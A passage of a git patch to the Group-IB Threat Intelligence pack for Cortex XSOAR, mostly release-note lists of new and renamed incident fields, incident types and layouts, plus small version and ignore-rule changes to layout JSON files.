Regions** +- New: **GIB Cybercriminal Expertises** +- New: **GIB Malware Aliases** +- **GIB Phishing Kit Hash** +- **GIB Admiralty Code** +- New: **GIB Phishing Kit Source** +- New: **GIB Threat Actor Country** +- New: **GIB Date Add** +- New: **GIB DDOS Protocol** +- **GIB Downloaded From** +- New: **GIB Malware Source Countries** +- New: **GIB DDOS Date Registration** +- New: **GIB DDOS Target Port** +- New: **GIB CPE Table** +- New: **GIB Organization CLABE** +- **GIB Threat Actor Name** +- New: **GIB Is Tailored** +- New: **GIB Phishing Objectives** +- New: **GIB Has Exploit** +- New: **GIB OSI Git Repository Files Table** +- New: **GIB Cybercriminal Sectors** +- New: **GIB Phishing Domain Puny** +- **GIB Phishing Domain** +- New: **GIB Socks Proxy Source** +- New: **GIB Nation-State Cybercriminals Threat Description** +- **GIB Screenshot** +- New: **GIB Threat Level** +- New: **GIB Link List Table** +- New: **GIB Nation-State Cybercriminals Threat Title** +- New: **GIB Proxy Type** +- New: **GIB Vulnerability Type** +- New: **GIB Cybercriminal Threat Actor Reports Table** +- New: **GIB Affected Software Table** +- New: **GIB VPN Sources** +- New: **GIB Parsed Login Domain** +- New: **GIB Nation-State Cybercriminals Threat Actor Roles** +- New: **GIB Organization IBAN** +- New: **GIB DDOS Target Domain** +- New: **GIB Cybercriminal Malware** +- New: **GIB Compromised Events Information Table** +- New: **GIB Mirror Link** +- New: **CPE Table** +- New: **GIB Cybercriminal Forums Table** +- New: **GIB Nation-State Cybercriminals Threat Actor Country** +- New: **GIB Cybercriminal Threat Actor Report Authors** +- New: **GIB Cybercriminal Threat Actor Aliases** +- New: **GIB Cybercriminal Threat Description** +- New: **GIB Malware Regions** +- New: **GIB Cybercriminal Threat Actor Description** +- New: **GIB CNC Port** +- New: **GIB Target Provider** +- **GIB Card Number** +- New: **GIB Phishing IP Table** +- New: **GIB Cybercriminal Threat Title** +- **GIB Inject MD5** +- **GIB Malware Name** +- New: **GIB Nation-State Cybercriminals Threat Expertises** +- New: **GIB DDOS Target ASN** +- New: **GIB Malware Description** +- **GIB Card Issuer** +- New: **GIB DDOS Request Headers Hash** +- **GIB Drop Email** +- New: **GIB Phishing URLs** +- **GIB Credibility** +- New: **GIB Target Domain Provider** +- New: **GIB Extended CVSS Overall** +- New: **GIB DDOS Date Begin** +- **GIB Person** +- New: **GIB DDOS Source** +- New: **GIB Extended CVSS Exploitability** +- New: **GIB Malware CNC Domain** +- **GIB Date Created** +- New: **GIB DDOS Target Category** +- New: **GIB Date Published** +- New: **GIB Phishing Sources** +- New: **GIB Href** +- New: **GIB Nation-State Cybercriminals Expertises** +- **GIB Card Type** +- New: **GIB Proxy Port** +- New: **GIB Date First Seen** +- New: **GIB DDOS Target Region** +- New: **GIB Extended CVSS Impact** +- New: **GIB CVSS Score** +- **GIB Date Compromised** +- **GIB Severity** +- **GIB Date Expired** +- New: **GIB Proxy Sources** +- New: **GIB Passwords** +- New: **GIB Compromised Events Table** +- **GIB Target Brand** +- New: **GIB Emails** +- **GIB Repository** +- New: **GIB Date Created At** +- New: **GIB DDOS Target Country Code** +- New: **GIB Service IP** +- New: **GIB Country Name** +- New: **GIB Nation-State Cybercriminals Threat Report Number** +- New: **GIB Nation-State Cybercriminals Threat Sectors** +- New: **GIB DDOS Duration** +- New: **GIB Leak Published** +- New: **GIB DDOS Date End** +- New: **GIB Deface Source** +- **GIB Target Domain** +- New: **GIB Nation-State Cybercriminals Threat Actor Labels** +- **GIB ID** +- **GIB Target Category** +- New: **GIB Extended CVSS Base** +- New: **GIB VPN Names** +- **GIB Leaked File Name** +- New: **GIB Upload Time** +- **GIB Email** +- New: **GIB Nation-State Cybercriminals Malware** +- New: **GIB Target Region** +- **GIB Phishing Type** +- **GIB CVV** +- New: **GIB CVSS Vector** +- New: **GIB Matches Table** +- New: **GIB Deface Contacts** +- New: **GIB Malware Platforms** +- New: **GIB Phishing Domain Expiration Date** +- New: **GIB Service URL** +- **GIB Favicon** +- New: **GIB Date Incident** +- New: **GIB Nation-State Cybercriminals Threat Regions** +- New: **GIB Nation-State Cybercriminals Threat Langs** +- New: **GIB Threat Actors Table** +- New: **GIB Malware Table** +- **GIB Threat Actor is APT** +- New: **GIB Extended CVSS Temporal** +- New: **GIB Phishing Kit Path** +- New: **GIB Nation-State Cybercriminals Threat Actor Description** +- New: **GIB Organization BIC** +- New: **GIB Target City** +- New: **GIB DDOS Target City** +- New: **GIB Malware Short Description** +- New: **GIB Provider Domain** +- New: **GIB Nation-State Cybercriminal Forums Table** +- New: **GIB Scanner Categories** +- **GIB Phishing Kit Emails** +- **GIB Leak Name** +- New: **GIB Country Code** +- New: **GIB Service Domain** +- New: **GIB Nation-State Cybercriminals Threat Actor Goals** +- **GIB Drop Email Domain** +- New: **GIB Date Last Seen** +- New: **GIB Deface Site URL** +- New: **GIB CNC URL** +- **GIB Reliability** +- New: **GIB DDOS Request Headers Body** +- New: **GIB Date Last Compromised** +- New: **GIB Merged Cvss** +- **GIB Leaked Data** +- **GIB Password** +- New: **GIB DDOS Target IP** +- New: **GIB Phishing Kit Email** +- New: **GIB Malware File hash** +- **GIB Data Hash** +- New: **GIB Organization BSB** +- New: **GIB Downloaded From Table** +- New: **GIB Phishing Date Detected** +- New: **GIB Organization Name** +- New: **GIB Nation-State Cybercriminals Threat Countries** +- **GIB Threat Actor ID** +- New: **GIB Bulletin Family** +- **GIB Address** +- New: **GIB DDOS Target Provider** +- New: **GIB Nation-State Cybercriminals Threat Actor Reports Table** +- **GIB Compromised Login** +- New: **GIB Phishing Kit Table** +- **GIB Phishing Status** +- New: **GIB Date First Compromised** +- New: **GIB Extended Description** +- **GIB Title** +- New: **GIB DDOS Type** +- **GIB HTML** +- New: **GIB DDOS Target Country Name** +- New: **GIB Parsed Login IP** +- **GIB Victim IP** +- New: **GIB Malware Categories** +- New: **GIB Date Updated At** #### Incident Types -- Added new incident types for new and old collections and also changed old incident types related to old collections - -##### New: GIB Nation-State Cybercriminals Threat Actor - -##### New: GIB Suspicious IP Scanner - -##### New: GIB Suspicious IP Socks Proxy - -##### New: GIB Compromised Card Group - -##### New: GIB Suspicious IP TOR Node - -##### New: GIB Attacks DDOS - -##### New: GIB Attacks Phishing Kit - -##### New: GIB Compromised Account Group - -##### GIB Compromised Card - -##### New: GIB OSI Vulnerability - -##### GIB OSI Public Leak - -##### New: GIB Nation-State Cybercriminals Threat - -##### GIB Brand Protection Phishing - -##### GIB Targeted Malware - -##### New: GIB Malware CNC - -##### New: GIB Cybercriminal Threat - -##### GIB Compromised Account - -##### New: GIB Malware - -##### GIB OSI Git Leak - -##### New: GIB Suspicious IP Open Proxy - -##### New: GIB Cybercriminal Threat Actor - -##### New: GIB Suspicious IP VPN - -##### New: GIB APT Threat - -##### New: GIB Compromised Mule - -##### GIB Data Breach - -##### GIB Brand Protection Phishing Kit - -##### New: GIB Attacks Deface - -##### New: GIB Attacks Phishing Group - +- New: **GIB Attacks DDOS** +- New: **GIB Compromised Account Group** +- New: **GIB Attacks Deface** +- **GIB OSI Git Leak** +- **GIB Compromised Account** +- **GIB Brand Protection Phishing Kit** +- **GIB Brand Protection Phishing** +- New: **GIB Nation-State Cybercriminals Threat Actor** +- New: **GIB Malware** +- New: **GIB Suspicious IP Open Proxy** +- **GIB Targeted Malware** +- New: **GIB Attacks Phishing Kit** +- New: **GIB Cybercriminal Threat** +- New: **GIB Suspicious IP Socks Proxy** +- New: **GIB Cybercriminal Threat Actor** +- New: **GIB APT Threat** +- New: **GIB Nation-State Cybercriminals Threat** +- New: **GIB Suspicious IP Scanner** +- New: **GIB Suspicious IP VPN** +- New: **GIB Suspicious IP TOR Node** +- New: **GIB Attacks Phishing Group** +- New: **GIB Compromised Card Group** +- **GIB Compromised Card** +- New: **GIB OSI Vulnerability** +- **GIB OSI Public Leak** +- **GIB Data Breach** +- New: **GIB Compromised Mule** +- New: **GIB Malware CNC** #### Indicator Fields -- Added new indicator fields for new and old collections and also changed old indicator fields related to old collections - -##### GIB Malware Name - -##### GIB Severity - -##### GIB Reliability - -##### GIB Threat Actor is APT - -##### GIB Admiralty Code - -##### GIB Credibility - -##### New: GIB Hash - -##### GIB ID - -##### GIB Threat Actor Name - -##### GIB Threat Actor ID - -##### GIB Collection - +- **GIB ID** +- **GIB Threat Actor Name** +- **GIB Malware Name** +- **GIB Reliability** +- **GIB Collection** +- **GIB Threat Actor ID** +- **GIB Severity** +- **GIB Threat Actor is APT** +- **GIB Proxy Anonymous** +- New: **GIB Hash** +- **GIB Credibility** +- **GIB Admiralty Code** + +#### Indicator Types + +- **GIB Victim IP** +- **GIB Compromised IMEI** +- **GIB Compromised Mule** #### Integrations ##### Group-IB Threat Intelligence -- Updated the Docker image to: *demisto/vendors-sdk:1.0.0.106889*. - Completely updated the code, the main work with API is rewritten to use the library - +- Updated the Docker image to: *demisto/vendors-sdk:1.0.0.2073752*. ##### Group-IB Threat Intelligence Feed -- Updated the Docker image to: *demisto/vendors-sdk:1.0.0.106889*. - Completely updated the code, the main work with API is rewritten to use the library +- Updated the Docker image to: *demisto/vendors-sdk:1.0.0.2073752*. #### Layouts +##### GIB OSI Public Leak Layout + - New layouts for new collections have been added, as well as old layouts have been modified -##### New: GIB Attacks Phishing Group Layout +##### New: GIB Suspicious IP Open Proxy Layout -##### GIB Compromised Card Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### GIB Brand Protection Phishing Kit Layout -##### New: GIB Compromised Account Group Layout +- New layouts for new collections have been added, as well as old layouts have been modified +##### GIB Victim IP Layout -##### GIB Targeted Malware Layout +- New layouts for new collections have been added, as well as old layouts have been modified +##### New: GIB Attacks Phishing Group Layout -##### New: GIB Suspicious IP Scanner Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### New: GIB Nation-State Cybercriminals Threat Layout -##### GIB Compromised Account Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### GIB Compromised Mule Layout -##### New: GIB Attacks Deface Layout +- New layouts for new collections have been added, as well as old layouts have been modified +##### GIB Compromised Account Layout -##### New: GIB Cybercriminal Threat Actor Layout +- New layouts for new collections have been added, as well as old layouts have been modified +##### New: GIB Attacks DDOS Layout -##### New: GIB Suspicious IP Open Proxy Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### GIB Targeted Malware Layout -##### New: GIB Malware CNC Layout +- New layouts for new collections have been added, as well as old layouts have been modified +##### New: GIB Attacks Phishing Kit Layout -##### GIB OSI Public Leak Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### New: GIB Suspicious IP Socks Proxy Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). ##### New: GIB Compromised Card Group Layout -##### New: GIB Nation-State Cybercriminals Threat Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### New: GIB Cybercriminal Threat Actor Layout -##### New: GIB OSI Vulnerability Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### New: GIB Compromised Account Group Layout -##### New: GIB Attacks Phishing Kit Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### GIB Data Breach Layout -##### GIB Victim IP Layout +- New layouts for new collections have been added, as well as old layouts have been modified +##### GIB OSI Git Leak Layout -##### GIB Data Breach Layout +- New layouts for new collections have been added, as well as old layouts have been modified +##### New: GIB Malware CNC Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). ##### New: GIB Cybercriminal Threat Layout -##### GIB Brand Protection Phishing Kit Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### GIB Compromised Card Layout -##### New: GIB APT Threat Layout +- New layouts for new collections have been added, as well as old layouts have been modified +##### New: GIB Attacks Deface Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). ##### New: GIB Nation-State Cybercriminals Threat Actor Layout -##### New: GIB Attacks DDOS Layout - -##### GIB Brand Protection Phishing Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### New: GIB Malware Layout -##### New: GIB Suspicious IP Socks Proxy Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### New: GIB OSI Vulnerability Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). ##### GIB Compromised IMEI Layout -##### GIB Compromised Mule Layout +- New layouts for new collections have been added, as well as old layouts have been modified +##### New: GIB Suspicious IP VPN Layout -##### GIB OSI Git Leak Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### GIB Brand Protection Phishing Layout -##### New: GIB Malware Layout +- New layouts for new collections have been added, as well as old layouts have been modified +##### New: GIB Suspicious IP TOR Node Layout -##### New: GIB Suspicious IP VPN Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### New: GIB APT Threat Layout -##### New: GIB Suspicious IP TOR Node Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). +##### New: GIB Suspicious IP Scanner Layout +- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0). #### Mappers ##### Group-IB Threat Intelligence (mapper) -- Added under new collections and edited under old collections +- Added and modified to support new collections + +#### Playbooks + +##### Incident Postprocessing - Group-IB Threat Intelligence & Attribution + +- Added and modified post-processing for new collections + +#### Scripts + +##### GIBIncidentUpdate -#### PreProcess Rules +- Added and modified to support new collections +- Updated the Docker image to: *demisto/python3:3.12.8.1983910*. +##### GIBIncidentUpdateIncludingClosed -##### New: gib_test +- Added and modified to support new collections +- Updated the Docker image to: *demisto/python3:3.12.8.1983910*. From 92e79eb12fd40a66df31a3b211e1ac32529cfea7 Mon Sep 17 00:00:00 2001 From: Amichai Date: Thu, 30 Jan 2025 12:51:43 +0200 Subject: [PATCH 5/9] New RN format --- .../.pack-ignore | 2 +- ...container-GIB_Compromised_Mule_Layout.json | 2 +- ...outscontainer-GIB_OSI_Git_Leak_Layout.json | 2 +- ...scontainer-GIB_OSI_Public_Leak_Layout.json | 2 +- .../ReleaseNotes/2_0_0.md | 1589 +++++++++++++---- 5 files changed, 1268 insertions(+), 329 deletions(-) diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore index 43743e9609fe..84d337d0295e 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore @@ -218,7 +218,7 @@ ignore=IF115 ignore=IF115 [file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Aliases.json] -ignore=IF115 +ignore=IF115,BA116 [file:incidentfield-GIB_Nation-State_Cybercriminal_Forums_Table.json] ignore=IF115 diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Mule_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Mule_Layout.json index d7190a4a63c1..9fe4dd777300 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Mule_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Mule_Layout.json @@ -5,7 +5,7 @@ "name": "GIB Compromised Mule Layout", "system": false, "version": -1, - "fromVersion": "0.0.0", + "fromVersion": "6.0.0", "detailsV2": { "tabs": [ { diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Git_Leak_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Git_Leak_Layout.json index eba2068f5639..22634bbdf900 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Git_Leak_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Git_Leak_Layout.json @@ -483,5 +483,5 @@ "name": "GIB OSI Git Leak Layout", "system": false, "version": -1, - "fromVersion": "0.0.0" + "fromVersion": "6.0.0" } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Public_Leak_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Public_Leak_Layout.json index 6536df8300de..b58209c5720b 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Public_Leak_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Public_Leak_Layout.json @@ -478,5 +478,5 @@ "name": "GIB OSI Public Leak Layout", "system": false, "version": -1, - "fromVersion": "0.0.0" + "fromVersion": "6.0.0" } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md index dfe89d9f6364..c8226c264d61 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md @@ -3,401 +3,1340 @@ ##### Group-IB Threat Intelligence (classifier) -- Added and modified classifications for new collections +- Updated the Group-IB Threat Intelligence (classifier) classifier to support new collections. #### Incident Fields -- New: **GIB Target ASN** -- **GIB Related Indicators Data** -- **GIB Inject Dump** -- New: **GIB Organization SWIFT** -- New: **GIB Update Time** -- **GIB Name Servers** -- **GIB Portal Link** -- **GIB Source** -- New: **GIB DDOS Target URL** -- New: **GIB Proxy Source** -- New: **GIB Reporter** -- New: **GIB CNC Domain** -- New: **GIB Phishing Brand** -- **GIB Card Valid Thru** -- New: **GIB Compromised Account** -- **GIB Payment System** -- New: **GIB Phishing Date Added** -- New: **GIB Report Number** -- New: **GIB Email Domains** -- New: **GIB Nation-State Cybercriminals Sectors** -- New: **GIB Malware Langs** -- New: **GIB Target IP** -- New: **GIB Date Modified** -- New: **GIB GIT Source** -- New: **GIB Deface Date** -- New: **GIB Cybercriminal Regions** -- New: **GIB DDOS Request Body Hash** -- New: **GIB CNC** -- New: **GIB DDOS Request Body** -- New: **GIB Nation-State Cybercriminals Threat Actor CVE** -- **GIB Date of Detection** -- **GIB Phishing Date Blocked** -- New: **GIB Phishing Registrar** -- New: **GIB DDOS Request Data Link** -- New: **GIB Nation-State Cybercriminals Regions** -- New: **GIB Cybercriminal Expertises** -- New: **GIB Malware Aliases** -- **GIB Phishing Kit Hash** -- **GIB Admiralty Code** -- New: **GIB Phishing Kit Source** -- New: **GIB Threat Actor Country** -- New: **GIB Date Add** -- New: **GIB DDOS Protocol** -- **GIB Downloaded From** -- New: **GIB Malware Source Countries** -- New: **GIB DDOS Date Registration** -- New: **GIB DDOS Target Port** -- New: **GIB CPE Table** -- New: **GIB Organization CLABE** -- **GIB Threat Actor Name** -- New: **GIB Is Tailored** -- New: **GIB Phishing Objectives** -- New: **GIB Has Exploit** -- New: **GIB OSI Git Repository Files Table** -- New: **GIB Cybercriminal Sectors** -- New: **GIB Phishing Domain Puny** -- **GIB Phishing Domain** -- New: **GIB Socks Proxy Source** -- New: **GIB Nation-State Cybercriminals Threat Description** -- **GIB Screenshot** -- New: **GIB Threat Level** -- New: **GIB Link List Table** -- New: **GIB Nation-State Cybercriminals Threat Title** -- New: **GIB Proxy Type** -- New: **GIB Vulnerability Type** -- New: **GIB Cybercriminal Threat Actor Reports Table** -- New: **GIB Affected Software Table** -- New: **GIB VPN Sources** -- New: **GIB Parsed Login Domain** -- New: **GIB Nation-State Cybercriminals Threat Actor Roles** -- New: **GIB Organization IBAN** -- New: **GIB DDOS Target Domain** -- New: **GIB Cybercriminal Malware** -- New: **GIB Compromised Events Information Table** -- New: **GIB Mirror Link** -- New: **CPE Table** -- New: **GIB Cybercriminal Forums Table** -- New: **GIB Nation-State Cybercriminals Threat Actor Country** -- New: **GIB Cybercriminal Threat Actor Report Authors** -- New: **GIB Cybercriminal Threat Actor Aliases** -- New: **GIB Cybercriminal Threat Description** -- New: **GIB Malware Regions** -- New: **GIB Cybercriminal Threat Actor Description** -- New: **GIB CNC Port** -- New: **GIB Target Provider** -- **GIB Card Number** -- New: **GIB Phishing IP Table** -- New: **GIB Cybercriminal Threat Title** -- **GIB Inject MD5** -- **GIB Malware Name** -- New: **GIB Nation-State Cybercriminals Threat Expertises** -- New: **GIB DDOS Target ASN** -- New: **GIB Malware Description** -- **GIB Card Issuer** -- New: **GIB DDOS Request Headers Hash** -- **GIB Drop Email** -- New: **GIB Phishing URLs** -- **GIB Credibility** -- New: **GIB Target Domain Provider** -- New: **GIB Extended CVSS Overall** -- New: **GIB DDOS Date Begin** -- **GIB Person** -- New: **GIB DDOS Source** -- New: **GIB Extended CVSS Exploitability** -- New: **GIB Malware CNC Domain** -- **GIB Date Created** -- New: **GIB DDOS Target Category** -- New: **GIB Date Published** -- New: **GIB Phishing Sources** -- New: **GIB Href** -- New: **GIB Nation-State Cybercriminals Expertises** -- **GIB Card Type** -- New: **GIB Proxy Port** -- New: **GIB Date First Seen** -- New: **GIB DDOS Target Region** -- New: **GIB Extended CVSS Impact** -- New: **GIB CVSS Score** -- **GIB Date Compromised** -- **GIB Severity** -- **GIB Date Expired** -- New: **GIB Proxy Sources** -- New: **GIB Passwords** -- New: **GIB Compromised Events Table** -- **GIB Target Brand** -- New: **GIB Emails** -- **GIB Repository** -- New: **GIB Date Created At** -- New: **GIB DDOS Target Country Code** -- New: **GIB Service IP** -- New: **GIB Country Name** -- New: **GIB Nation-State Cybercriminals Threat Report Number** -- New: **GIB Nation-State Cybercriminals Threat Sectors** -- New: **GIB DDOS Duration** -- New: **GIB Leak Published** -- New: **GIB DDOS Date End** -- New: **GIB Deface Source** -- **GIB Target Domain** -- New: **GIB Nation-State Cybercriminals Threat Actor Labels** -- **GIB ID** -- **GIB Target Category** -- New: **GIB Extended CVSS Base** -- New: **GIB VPN Names** -- **GIB Leaked File Name** -- New: **GIB Upload Time** -- **GIB Email** -- New: **GIB Nation-State Cybercriminals Malware** -- New: **GIB Target Region** -- **GIB Phishing Type** -- **GIB CVV** -- New: **GIB CVSS Vector** -- New: **GIB Matches Table** -- New: **GIB Deface Contacts** -- New: **GIB Malware Platforms** -- New: **GIB Phishing Domain Expiration Date** -- New: **GIB Service URL** -- **GIB Favicon** -- New: **GIB Date Incident** -- New: **GIB Nation-State Cybercriminals Threat Regions** -- New: **GIB Nation-State Cybercriminals Threat Langs** -- New: **GIB Threat Actors Table** -- New: **GIB Malware Table** -- **GIB Threat Actor is APT** -- New: **GIB Extended CVSS Temporal** -- New: **GIB Phishing Kit Path** -- New: **GIB Nation-State Cybercriminals Threat Actor Description** -- New: **GIB Organization BIC** -- New: **GIB Target City** -- New: **GIB DDOS Target City** -- New: **GIB Malware Short Description** -- New: **GIB Provider Domain** -- New: **GIB Nation-State Cybercriminal Forums Table** -- New: **GIB Scanner Categories** -- **GIB Phishing Kit Emails** -- **GIB Leak Name** -- New: **GIB Country Code** -- New: **GIB Service Domain** -- New: **GIB Nation-State Cybercriminals Threat Actor Goals** -- **GIB Drop Email Domain** -- New: **GIB Date Last Seen** -- New: **GIB Deface Site URL** -- New: **GIB CNC URL** -- **GIB Reliability** -- New: **GIB DDOS Request Headers Body** -- New: **GIB Date Last Compromised** -- New: **GIB Merged Cvss** -- **GIB Leaked Data** -- **GIB Password** -- New: **GIB DDOS Target IP** -- New: **GIB Phishing Kit Email** -- New: **GIB Malware File hash** -- **GIB Data Hash** -- New: **GIB Organization BSB** -- New: **GIB Downloaded From Table** -- New: **GIB Phishing Date Detected** -- New: **GIB Organization Name** -- New: **GIB Nation-State Cybercriminals Threat Countries** -- **GIB Threat Actor ID** -- New: **GIB Bulletin Family** -- **GIB Address** -- New: **GIB DDOS Target Provider** -- New: **GIB Nation-State Cybercriminals Threat Actor Reports Table** -- **GIB Compromised Login** -- New: **GIB Phishing Kit Table** -- **GIB Phishing Status** -- New: **GIB Date First Compromised** -- New: **GIB Extended Description** -- **GIB Title** -- New: **GIB DDOS Type** -- **GIB HTML** -- New: **GIB DDOS Target Country Name** -- New: **GIB Parsed Login IP** -- **GIB Victim IP** -- New: **GIB Malware Categories** -- New: **GIB Date Updated At** +##### New: GIB Cybercriminal Forums Table + +- New: Added a new incident field- GIB Cybercriminal Forums Table that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB CVSS Score + +- New: Added a new incident field- GIB CVSS Score that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Country Code + +- New: Added a new incident field- GIB Country Code that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Cybercriminal Threat Actor Report Authors + +- New: Added a new incident field- GIB Cybercriminal Threat Actor Report Authors that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Date Last Seen + +- New: Added a new incident field- GIB Date Last Seen that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Target Brand + +- Updated the GIB Target Brand incident field to support new collections. +##### New: GIB CVSS Vector + +- New: Added a new incident field- GIB CVSS Vector that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Is Tailored + +- New: Added a new incident field- GIB Is Tailored that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Malware Platforms + +- New: Added a new incident field- GIB Malware Platforms that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Nation-State Cybercriminals Expertises + +- New: Added a new incident field- GIB Nation-State Cybercriminals Expertises that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Email Domains + +- New: Added a new incident field- GIB Email Domains that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Target Country Name + +- New: Added a new incident field- GIB DDOS Target Country Name that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Inject Dump + +- Updated the GIB Inject Dump incident field to support new collections. +##### New: GIB Organization Name + +- New: Added a new incident field- GIB Organization Name that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Proxy Port + +- New: Added a new incident field- GIB Proxy Port that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Target Port + +- New: Added a new incident field- GIB DDOS Target Port that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Phishing Kit Hash + +- Updated the GIB Phishing Kit Hash incident field to support new collections. +##### GIB Malware Name + +- Updated the GIB Malware Name incident field to support new collections. +##### New: GIB Nation-State Cybercriminals Threat Langs + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Langs that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Phishing Kit Email + +- New: Added a new incident field- GIB Phishing Kit Email that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Target Domain + +- New: Added a new incident field- GIB DDOS Target Domain that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Nation-State Cybercriminals Threat Regions + +- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Regions that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Target Provider + +- New: Added a new incident field- GIB Target Provider that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Malware Source Countries + +- New: Added a new incident field- GIB Malware Source Countries that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB Date Published + +- New: Added a new incident field- GIB Date Published that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### New: GIB DDOS Target Country Code + +- New: Added a new incident field- GIB DDOS Target Country Code that support new collections +<~XSIAM> (Available from Cortex XSIAM 2.0). +<~XSOAR> (Available from Cortex XSOAR 6.10.0). +##### GIB Drop Email Domain + +- Updated the GIB 